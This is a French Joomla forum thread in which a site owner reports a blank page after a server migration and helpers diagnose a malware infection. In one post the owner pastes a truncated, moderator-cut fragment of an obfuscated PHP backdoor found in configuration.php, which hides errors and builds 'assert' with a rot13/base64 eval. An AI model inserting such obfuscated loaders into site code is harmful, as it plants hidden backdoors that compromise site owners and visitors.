Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • [Problème] Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

    Salut la communauté,

    vous êtes mon dernier espoir...
    Suite à la migration interne chez mon hébergeur (Infomaniak, ancien vers nouveau serveur), suite aux test requis et passés avec succès, j'ai suivi la recommendation de mon hébergeur en modifiant la version PHP jujée obsolète. Donc, vers 5.6.
    Ma version joomla est 3.6 et le jour de la migration définitive, le site a fonctionné sans problème. J'ai teste les fonctions et modules divers et tout fonctionnait bien.
    Le lendemain: PAGE BLANCHE!!
    Depuis, j'ai tout essayé et rien ne fonctionne. J'ai mis un fichier index.html afin d'afficher une page de maintenance.
    Voici l'adresse du site:
    Ecurie Ardennaise de la Mess - Site dédié à l'élevage et la promotion de la rasse de chevaux de traît ardennais.


    J'ai bien entendu directement contacté mon hébergeur car j'ai pensé à un problème de serveur et ils m'on expliqué que si problème il y avait, cela serai au niveau de mes aplications et donc cela n'était plus de leurs ressorts...
    Cela me déçois car c'est bien à cause de cette fichue migration que je me retrouve devant un écran vide...

    Je ne suis pas un génie en informatique ni pro en php, mais j'ai vu et revu toutes les manipulations et ne sais plus qoi faire.
    Ce qui m'irrite c'est que si j'aurai fait une erreur, cela n'aurait pas fonctionné 1 jour et puis hop plus dutout...

    Je ne sais plus ou aller voir ni que faire...



    Au secours...

  • #2
    Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

    Tu as une erreur 500 aussi je te suggère de supprimer ton fichier .htaccess qui se trouve à la racine de ton site pour voir si c'est mieux.

    Ton hébergeur devrait t'aider selon moi. Une erreur 500 est une erreur serveur et non applicative.

    Bonne soirée
    Christophe (cavo789)
    Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
    Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

    Commentaire


    • #3
      Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

      Tu as aussi une page blanche sur ton admin
      Il faudrait supprimer ou renommer le fichier .htaccess

      Par contre, je vois ça


      tu as combien de site installé sur ton hébergement ?
      Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
      Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

      Commentaire


      • #4
        Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

        @cavo789:
        la supression du fichier .htaccess n'a rien donné...

        @manu93fr:
        Les fichiers .html s'affichent sans problème. J'ai uniquement 1 site installé ainsi que quelques "anciens" fichiers en html.
        Le fichier que tu a pu visionné fait partie de 4 fichiers appartenant a l'ancien site et ils sont destinés à être visionnés (via un lien) comme archives.

        Commentaire


        • #5
          Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

          Salut,
          Tu devrais régler Rapport d'erreurs à développement,
          qui signale les erreurs PHP, ce qui peut aider à savoir où ça coince.

          Dans configuration.php, cherche public $error_reporting et met-le à "development" :
          public $error_reporting = 'development';
          Un message d’erreur sur votre site Joomla ... ayez le reflexe de consulter lla base de connaissance : https://kb.joomla.fr

          Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer

          Commentaire


          • #6
            Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

            @ghazal:
            Voila, rapport d'erreur réglé comme indiqué.

            Par contre, je me retrouve avec une "partition" dans le fichier configuration.php qui n'y était pas avant:

            //###===###
            error_reporting(0);
            $strings = "as";$strings .= "sert";
            if (!@$mdc96972) {$mdc96972=1;@$strings(str_rot13('riny(onfr64_qrpb qr("
            [MODO]Suppression d'une partie du virus[/MODO]
            //###===###


            C qoi ça???
            Dernière édition par cavo789 à 10/08/2016, 21h02

            Commentaire


            • #7
              Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

              Je dirai une belle bête ! Pas de doute !!! ton site a des bestioles (fc Cavo)
              comment as tu fais pour changer la valeur de error_reporting ?

              Vire sans pitié le code qui te semble suspect ... fais en une copie quand même avant
              Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
              Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

              Commentaire


              • #8
                Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

                Bonsoir

                Zéro doute aucun : c'est chose, c'est un virus.

                Ton site est vérolé et je te suggère de récupérer une archive saine du site et si tu n'en as pas, tu es bon pour un nettoyage en profondeur.

                Bonne soirée (malgré tout)
                Christophe (cavo789)
                Mon blog, on y parle Docker, PHP, WSL, Markdown et plein d'autres choses : https://www.avonture.be
                Logiciel gratuit de scan antivirus : https://github.com/cavo789/aesecure_quickscan (plus de 45.000 virus détectés, 700.000 fichiers sur liste blanche)​

                Commentaire


                • #9
                  Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

                  M....de!
                  J'ai une sauvegarde/copie complète du site que j'ai fait avant la migration, mais comment savoir si elle est "propre"?

                  Commentaire


                  • #10
                    Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

                    @manu93fr
                    J'ai changé le code via le logiciel Dreamweaver.

                    Commentaire


                    • #11
                      Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

                      Envoyé par Nukigo Voir le message
                      @manu93fr
                      J'ai changé le code via le logiciel Dreamweaver.
                      Logiciel avec license ou tombé du camion ? parec que vu que tu n'avais pas vu ce bout de code avant, je me pose des questions
                      Essaie plutot avec notepad++ (gratuit)
                      Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
                      Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

                      Commentaire


                      • #12
                        Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

                        Logiciel acheté légalement avec licence (pac Adobe avec les logiciels de graphisme). J'utilise notepad++ également, mais comme je suis plus habitué a Dreamweaver....

                        Commentaire


                        • #13
                          Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

                          J'ai vu ce code dans d'autres fichiers .php et xml mais comme je ne les avait pas consulté avant, je n'y ai pas praité attention. Je ne m'y connais pas en php.

                          Commentaire


                          • #14
                            Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

                            ok
                            Si tu vois ce code partout ... va falloir tout nettoyer du sol au plafond !!!
                            Ce forum, vous l'aimez ? il vous a sauvé la vie ? Vous y apprenez chaque jour ? Alors adhérez à l'AFUJ https://www.joomla.fr/association/adherer
                            Cette année, le JoomlaDay FR a lieu à Bruxelles, les 20 et 21 mai 2022, plus d'infos et inscriptions : www.joomladay.fr

                            Commentaire


                            • #15
                              Re : Situation désespérée: page blanche 1 jour après migration sur nouveau serveur

                              @manu93fr:
                              Après une nuit gruyère passée à digérer la bonne nouvelle, je me pose des tas de questions comme p.ex.... recommencer le site a zéro?
                              Quels fichiers (leur précieux contenu) récupérer et comment?
                              Est-ce que l'infection touche également les fichier images?
                              Une alternative qui fonctionne à moyen ou long terme?
                              Comment faire en sorte que cela ne se produise plus?
                              D'ou viens l'infection? Est-il possible que cela provienne d'un ordinateur infecté? Est-le même genre de bête?
                              Comment purger la sauvegarde du site faite avant la migration? Celle-ci est sur mon ordinateur qui lui n'est pas constemment connecté au net...

                              Désolé pour toutes ses questions, j'essaye de comprendre pour apprendre a mieux faire...

                              Merci

                              Commentaire

                              Annonce

                              Réduire
                              Aucune annonce pour le moment.

                              Partenaire de l'association

                              Réduire

                              Hébergeur Web PlanetHoster
                              Travaille ...
                              X